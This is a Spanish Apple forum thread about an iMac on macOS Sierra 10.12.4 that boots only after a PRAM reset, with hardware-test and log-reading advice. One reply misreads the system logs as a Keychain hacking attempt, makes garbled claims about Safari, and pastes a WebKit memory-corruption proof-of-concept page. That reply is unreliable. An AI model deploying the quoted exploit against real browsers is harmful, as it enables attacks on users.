iMac Retina 5k con macOS Sierra 10.12.4 solo arranca cada vez reseteando PRAM y SMC

OscarRA

Nuev@ Applesan@
Hola Applesans, desde hace un tiempo vengo con unos fallos en un iMac Retina 5K con la nueva actualización macOS Sierra 10.12.4. Por las noches termino de trabajar y a la mañana siguiente no arranca.

Cuando lo arrancas, sale la barra de progreso y el fondo negro, pero no avanza y no termina de salir la pantalla de inicio de sesión para meter la contraseña.

Dando muchas vueltas, he visto que con resetear la PRAM si arranca, Command + Option + R + P

Aparte de desconectar el cable de alimentación unos 15 segundos, volverlo a conectar, esperar 5 segundos y resetear la SMC.

¿Alguna pista de qué puede ser?
 

marian

Marian
Hola, vamos a dar uno pocos pasos para ir descartando problemas, que no arranque directamente puede ser por estar corrupta la PRAM y no tener bien definido el disco de arranque. También por tener algún fallo en el disco.


Comenzamos por un chequeo de hardware, lo que viene siendo un Apple Hardware Test


Cuando arranques y escuches el sonido de inicio, presiona la tecla D, ¿Pasa el test?
 

OscarRA

Nuev@ Applesan@
Gracias marian por la recomendación, acabo ahora mismo de hacer el AHT sin ningún problema dice la pantalla y me da el número de serie y el número de informe. Hecho sin ningún periférico ni cable ethernet.

Al terminar, intenta iniciar el sistema operativo (Barra de progreso) y se para, no arranca. Vuelta a empezar, apagar equipo y reset PRAM.
 

marian

Marian
Al menos hay algo importante y descartamos fallos de hardware. Ahora cuando inicias bien tras el reset de la PRAM, entra en Preferencias->Disco de Arranque y marca activa la partición del disco duro principal y reinicio.

¿Puedes arrancar como siempre?
 

OscarRA

Nuev@ Applesan@
Pues nada que sigue igual, le doy a reiniciar en el volumen y no arranca, se queda en la barra de progreso. Apago con el botón On/Off y vuelta a empezar, reset PRAM y ya si.

¿Se habrá roto el chip de la placa base donde se almacena la PRAM?

La cosa es que está en garantía y no sé si seguir con esta molestia o tirar para una Apple Store o enviarlo a Apple directamente. No me parece normal que un ordenador de 3.000€ necesite hacer todas estas mil quinientas todos los días para arrancar.
 

maxim

@maxim_apps
Hola OscarRA, estaba leyendo el hilo y veo que te pasa al arrancar siempre, vamos a ver una cosa por si nos saca de dudas.

Vete a Aplicaciones->Utilidades

Allí tienes una app que se llama Consola, es un lector de logs en general

Una vez que lo abras, lee System.log, es el que hay solo en mitad de la barra izquierda.

Ahora fíjate en el horario, y pega la salida de los últimos cuando apagaste el ordenador ayer. Por ejemplo, si lo encendiste a las 10:00 de la mañana, y lo cerraste a las 14:00 horas, pega las 10 últimas lineas hasta las 14:00 especialmente las que da error.

Saludos
 

OscarRA

Nuev@ Applesan@
Hola maxim, gracias por unirte a ese hilo. Pues las líneas que me comentas deben ser éstas:

Apr 14 01:36:50 com.apple.xpc.launchd[1] (com.apple.WebKit.Networking.F4ADC6CE-1120-4381-82F1-8295B0099107[734]): Service exited with abnormal code: 1
Apr 14 01:36:50 com.apple.xpc.launchd[1] (com.apple.WebKit.Databases.D7E2A1170-1A19-1E3F-3744-3011121C3571[746]): Service exited with abnormal code: 1
Apr 14 01:37:07 com.apple.xpc.launchd[1] (com.apple.xpc.launchd.user.domain.501.100008.Aqua): Caller not allowed to perform action: loginwindow.97, action = service removal, code = 150: Operation not permitted while System Integrity Protection is engaged, uid = 0, euid = 501, gid = 20, egid = 20, asid = 100008

Saludos
 

maxim

@maxim_apps
Al parecer por esos logs todo apunta a un problema de Safari, la verdad es que Safari para Mac es un cáncer que Apple tendría que exterminar de una vez por todas.


Y me explico, el mayor fallo de seguridad y de diseño de macOS es integrar Safari en el sistema, es la única app que tiene acceso a algo tan delicado como el Llavero o KeyChain.


Eso lo saben los hacker y por eso desde un simple código en cualquier página web, acceden a tus contraseñas, ya sabes, y luego hackean tu iCloud que da gusto.




En ese log, te dice que están intentando acceder al llavero pero que la operación no está permitida.
com.apple.WebKit.Networking
com.apple.WebKit.Databases

Ese fallo lo arregló el único ingeniero que se está haciendo cargo de macOS Sierra ahora mimo, Iam del equipo de seguridad de Google Project. Supuestamente estás solucionado en macos Sierra 10.12.4, las anteriores versiones son vulnerables.


Aquí está documentado ese exploit


https://www.exploit-db.com/exploits/41813/


-->

<style>
* { -webkit-border-image: url(#foo) 1 5 1 63 repeat; -webkit-flow-into: foo }
</style>
<script>
function eventhandler() {
var a;
document.execCommand("selectAll", false);
output.slot = "foo";
table.deleteCaption();
//trigger garbage collector
for(var i=0;i<100;i++) {
a = new Uint8Array(1024*1024);
}
}
</script>
<table id="table">
<caption>
<summary>
<output id="output">
<table>
<th>foo</th>
</table>
</table>
<iframe onload="eventhandler()"></iframe>

<!--




Lo raro del asunto es que se supone que está solucionado en Safari 10.1.1 (12603.2.2)


Mi consejo es que intentes no usar Safari y te desconectes de iCloud sin sincronizar un buen tiempo y vigiles los logs a ver que pasa.
 

OscarRA

Nuev@ Applesan@
Pues no hay manera, finalmente he llamado a Apple, bueno en realidad he rellenado un formulario y han sido ellos los que me han llamado en menos de dos minutos.


El tipo que me ha atendido me ha hecho los mismos pasos que me habéis recomendado en Applesana. Presionar tecla D y hacer el AHT, reinstalar desde cero bajando desde Apple macOS Sierra 10.12.4 con la tecla Command + Shift + R.


Y nada, todo sigue igual así que he vuelto a llamar y ya me han conocido por el número de incidencia.
Me cuentan que vaya a una Apple Store o reseller certificado por mi C.P para cambiar placa base al estar en garantía


En fin, supongo que la actualización 10.12.4 se ha cargado el iMac, no es normal tener que resetar PRAM cada vez que arranco el ordenador, menos aun que no me arranque desde un HD SSD USB 3.0 a la primera.


Uso un SSD por USB 3.0 porque es mucho más rápido que el Fusion del iMac.


Por suerte el MacBook Pro si funciona normal y puedo arrancar con SSD por USB 3.0 con todos mis datos.


Gracias a todos por los consejos.
 
Arriba